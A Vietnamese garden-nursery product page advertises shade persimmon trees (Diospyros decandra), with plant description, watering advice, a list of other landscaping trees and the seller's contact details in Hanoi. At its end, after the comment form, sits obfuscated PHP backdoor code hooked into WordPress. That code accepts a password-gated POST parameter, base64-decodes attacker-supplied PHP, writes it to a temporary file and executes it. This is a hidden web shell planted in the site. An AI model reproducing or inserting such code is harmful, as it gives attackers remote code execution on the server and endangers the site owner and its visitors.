Bán Cây Thị Bóng Mát

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Bán cây Thị Bóng Mát – Mua bán cây trồng giá rẻ tại Hà nội

Cây Thị Bóng Mát

Cây thị Bóng Mát là loài cây gắn liền với đời sống nhân dân Việt Na. Không chỉ để làm cảnh, lấy bóng mát, thị còn  được biết đến với những trái chín vàng thơm ngát hương.

Cây thị là loài cây gắn liền với đời sống nhân dân Việt Na. Không chỉ để làm cảnh, lấy bóng mát, thị còn  được biết đến với những trái chín vàng thơm ngát hương.

Tên thường gọi: cây thị Bóng Mát

Tên khoa học:Diospyros decandra

Họ: Ebenaceae

Một số những loại cây công trình phổ biến hiện nay được trồng phổ biến nhất:

Cây phong thủy: Cây kim tiền,cây vạn tuế,cây osaka đỏ, cây mơ rừng,cây tùng bồng lai để bàn,cây lan quân tử

Cây xanh công trình: Cây thông công trình,cây khế công trình,cây xà cừ công trình,cây dầu rái,cây chiêu liêu,cây điệp vàng công trình,cây long não,cây hoa sữa công trình,cây cọ công trình, cây nhãn công trình,cây ngọc lan công trình, cây bồ đề công trình, cây vú sữa công trình,cây lộc vừng công trình, cây cau vua công trình,cây sung công trình,cây xoài công trình

Cây xanh đô thị:Cây sấu công trình, cây bằng lăng công trình, cây phượng công trình

cây thị bóng mát
cây thị bóng mát

Đặc điểm cây thị bóng mát

Cây Thị bóng mát ngoài việc trồng và mọc tự nhiên để lấy quả, còn được cung cấp, mua bán để trồng tạo cảnh quan làm cây công trình cho biệt thự sân vườn, khu đô Thị.

Cây Thị tên khoa học là: Diospyros decandra, thuộc họ: Ebenaceae. Cây Thị là loài cây nhỏ, cao khoảng 5-6m, Lá cây dài 6-8cm, rộng 3-4cm, ngọn lá nhọn mũi. Hoa sắc trắng, mọc thành chùm, cuống hoa chia thành 3-6múi.

Quả Thị bóng mát dáng tròn, khi chín có màu vàng, mọng nước, to khoảng 3-6cm, thường chia thành 6-8 “múi”. Cuống hoa dính sát vào quả. Quả Thị khi chín có mùi thơm dịu nhẹ, được ưa chuộng tại Việt Nam. Người ta thường lấy quả Thị rồi treo trong nhà để thưởng thức hương thơm của Thị.

Quả Thị bóng mát chín ăn ngon nếu biết cách ăn (xoay quả và bóp nhẹ cho đến khi thịt quả mềm ra và nứt ra một khe nhỏ thì cho lên miệng hút).

Một số cây công trình đang được quan tâm: Cây đa búp đỏ, cây bách xanh, cây bàng đài loan, cây mít công trình, cây tùng bách, cây lộc vừng,cây sấu công trình, cây phượng công trình , cây sung công trình,cây xoài công trình, cây cau vua công trình cây lộc vừng,cây bồ đề, cây vú sữa, Cây osaka đỏ,cây ngọc lan ,Cây kim tiền, cây vạn tuế, cây cọ ,cây hoa sữa 

 

cây thị bóng mát
cây thị bóng mát

Tác dụng cây thị bóng mát

Thân: thân cây gỗ, khá to. Khi già thân cây mục rỗng dần

Tán: tán rộng, nhiều nhánh mọc từ thân toả ra

Lá: lá nhỏ, dài khoảng 6-8cm. Màu xanh đậm, vót nhọn ở 2 đầu và cuống lá

Quả: quả thị bóng mát khi chín có màu vàng, rất thơm và ăn cũng rất ngon.

Tốc độ sinh trưởng: chậm

Phù hợp với: môi trường đất

Quả thị bóng mát dáng tròn, khi chín có màu vàng, mọng nước, to khoảng 3–6 cm, thường chia thành 6-8 “múi”. Cuống hoa dính sát vào quả. Quả thị khi chín có mùi thơm dịu nhẹ, được ưa chuộng tại Việt Nam. Người ta thường lấy quả thị rồi treo trong nhà để thưởng thức hương thom của thị.

Hiện tại thì Vườn Cây Hòa Bình đang có cung cấp các loại cây trồng , cây công trình, cây phong thủy, cây xanh đô thị, cây ngoại thất , cây nội thất, thu mua cây xanh

 

cây thị bóng mát
cây thị bóng mát

Cách trồng và chăm sóc cây thị bóng mát

Chế độ Nước: Nếu trồng cây thị bóng mát bạn nên tưới cho cây khoảng 3-4 lần một tuần

Vườn cây Hòa Bình chúng tôi đang có những ưu đãi lớn về các loại cây công trình, cây phong thủy,cây xanh đô thị  sẽ luôn là sự lựa chọn tốt nhất cho khách hàng đến với vườn cây Hòa Bình chúng tôi

cây thị bóng mát
cây thị bóng mát
Mua cây thị bóng mát ở đâu giá rẻ Hà nội

Bạn sẽ nhận được lợi ích gì khi hợp tác với Vườn cây Hòa Bình

 

Hàng luôn có sẵn với số lượng từ ít đến nhiều, đủ đảm bảo để cung cấp cho các dự án cây thị bóng mát từ lớn đến nhỏ, sẵn sàng thi công ngay cả với các công trình đang gấp tiến độ. Với khách hàng là nhà riêng, chúng tôi vận chuyển và trồng cây trong ngày.

 

Cây có đủ mọi kích thước theo yêu cầu, nhưng thường cũng chỉ có vài loại đúng tiêu chuẩn để trồng công trình hay sân vườn. (xin hãy gọi để được tư vấn).

 

Nhà vườn cung cấp cây công trình với giá gốc. Lý do: cây được khai thác trực tiếp từ rừng (có giấy phép của kiểm lâm) hoặc các vườn cây vùng rừng núi và được đem về giâm ủ tại vườn.

cây thị bóng mát
cây thị bóng mát

LIÊN HỆ

CÂY XANH HÒA BÌNH
– Hotline: 0962.376.560 _Gmail:cayxanhhoabinh2017@gmail.com

– Nguyễn Trường Giang
– Địa chỉ: Tổ dân phố hoà bình 2, Biên giang , Hà Đông ,Hà Nội

 

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}